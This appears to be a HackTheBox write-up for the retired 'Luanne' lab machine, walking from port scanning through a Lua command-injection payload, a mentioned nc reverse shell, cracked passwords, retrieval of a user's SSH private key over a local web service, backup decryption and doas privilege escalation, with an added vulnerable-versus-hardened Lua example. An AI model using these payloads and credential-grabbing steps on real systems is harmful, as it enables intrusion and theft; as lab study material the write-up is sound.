Hackthebox - Luanne

Summary

Luanne, a FreeBSD box created by HackTheBox user Luanne, was an overall easy box. The initial foothold was finding a command injection in a Lua API, which gives us a shell as the httpd user. Enumerating further, we find a local instance of the same service running as httpd_devel, and checking http://127.0.0.1:3001/~r.michaels/ we find the user's key. After getting user as r.michaels we find a backups folder containing an encrypted file, which we can decrypt with netpgp; inside it we find a .htaccess file, and cracking the password hash in it and trying that password with doas we can switch to root.

Initial Enumeration

Let's start with an nmap scan:

sudo nmap -sC -sV -oN nmap/luanne  10.10.10.218
# Nmap 7.91 scan initiated Sun Nov 29 00:30:45 2020 as: nmap -sC -sV -oN nmap/luanne 10.10.10.218
Nmap scan report for 10.10.10.218
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 29 00:34:08 2020 -- 1 IP address (1 host up) scanned in 203.96 seconds

Web 80

Opening the web page, it asked for credentials.

Checking robots.txt:

Disallow: /weather  #returning 404 but still harvesting cities

Running ffuf, we found an API at

http://10.10.10.218/weather/forecast?city=list

which gave me:

{
"code": 200,
"cities": ["London", "Manchester", "Birmingham", "Leeds", "Glasgow", "Southampton", "Liverpool", "Newcastle", "Nottingham", "Sheffield", "Bristol", "Belfast", "Leicester"]
}

Trying a few things, I didn't find anything interesting,

so I left this port and moved to 9001.

9001

In the nmap scan we saw that this port is running supervisord. Googling for that turns up a possible exploit, but it needs credentials; more googling showed the default credentials to be user:123 on default-creds.

So, trying the exploit,

we get a 400, so maybe that is not the way.

So I checked the page itself, and looking at the process list I saw

that the weather API is a Lua script:

r /usr/local/webapi/weather.lua -U _httpd -b /var/www

Port 80 again

So I started to play around with command injection in Lua, and I was successful with the

city=London');print("Hello")--

payload.

Using the same technique I got code execution with os.execute("<cmd>").
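The injection works because the handler turns the city parameter into Lua source and compiles it. The following is an added example, not the box's weather.lua (which this write-up does not reproduce): a hypothetical handler written that way, beside a hardened version that checks the value against the city list the API returned and never compiles user input. The names forecast, handle_vulnerable and handle_hardened and the `result = forecast('...')` source template are assumptions.

```lua
-- Added example, not the box's weather.lua: a hypothetical handler that
-- splices the "city" parameter into Lua source (the vulnerable pattern the
-- payload above exploits) beside a hardened handler that validates the
-- parameter against an allowlist. Runs on Lua 5.1 (loadstring) and 5.2+ (load).
local compile = loadstring or load

-- Constructed sample data: the city list the API returned for city=list.
local CITIES = { "London", "Manchester", "Birmingham", "Leeds", "Glasgow",
  "Southampton", "Liverpool", "Newcastle", "Nottingham", "Sheffield",
  "Bristol", "Belfast", "Leicester" }
local ALLOWED = {}
for _, name in ipairs(CITIES) do ALLOWED[name] = true end

-- Hypothetical stand-in for the real forecast lookup. It is a global on
-- purpose so the chunk compiled by the vulnerable handler can reach it.
function forecast(city)
  return { code = 200, city = city, forecast = "rain" }
end

-- VULNERABLE: the query value becomes part of Lua source that is compiled
-- and executed. With city = London');print("Hello")--  the source is
--   result = forecast('London');print("Hello")--')
-- the quote and call are closed, the injected statement runs, and the
-- trailing "--" comments out the leftover characters.
local function handle_vulnerable(city)
  local src = "result = forecast('" .. city .. "')"
  local chunk, err = compile(src)
  if not chunk then
    return { code = 500, error = err }
  end
  result = nil   -- global the generated source assigns to
  chunk()        -- any injected statement executes here
  return result
end

-- HARDENED: the value is only used as a table key; anything not in the
-- allowlist is rejected with 400 before any lookup or call happens.
local function handle_hardened(city)
  if type(city) ~= "string" or not ALLOWED[city] then
    return { code = 400, error = "unknown city" }
  end
  return forecast(city)
end

-- The payload from the write-up, as a constructed test input.
local payload = "London');print(\"Hello\")--"

local v = handle_vulnerable(payload)   -- the injected print runs
print("vulnerable:", v.code, v.city)

local h = handle_hardened(payload)     -- rejected, nothing injected runs
print("hardened:", h.code, h.error)

local ok = handle_hardened("Leeds")    -- a listed city still works
print("hardened:", ok.code, ok.city)
```

The fix is not escaping the quote: any design that compiles request data is one missed character away from the same outcome. Looking the parameter up in a fixed table removes the code path entirely, and a 400 for unknown values is also an easy thing to alert on in the access log.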

Using that, I got a reverse shell with nc.

HTTPd

After getting a shell I tried to crack the hash in .htpasswd

and got the credentials:

webapi_user:iamthebest

We had also seen in the supervisord log that port 3001 is running locally as user r.michaels.

I tried the same command injection, but that failed against the internal API.

So, enumerating more, I looked into /etc/rc.conf and saw:

httpd_devel=YES
httpd_devel_wwwuser="r.michaels"
httpd_devel_wwwdir="/home/r.michaels/devel/www"
httpd_devel_flags="-u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua"

Checking the httpd documentation (the -u flag enables ~user URL translation),

we can run curl like this too:

curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

That revealed that there is an id_rsa:

curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa

which gave the user's SSH key.

User (r.michaels)

We can use that key to SSH in as the user:

ssh -i user.pem r.michaels@10.129.44.98

Doing an ls -l reveals a

dr-xr-xr-x  2 r.michaels  users   512 Nov 24 09:26 backups

directory in the user's home, which seems the most interesting.

Checking inside it we find

devel_backup-2020-09-16.tar.gz.enc

Seeing that it is encrypted, I tried using netpgp (with the user's own key) to decrypt it:

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz

Root

Cracking the password hash found in the decrypted backup and using that password with doas, we get root:

doas -u root /bin/sh
Password: littlebear

And we have pwned Luanne 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/luanne/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.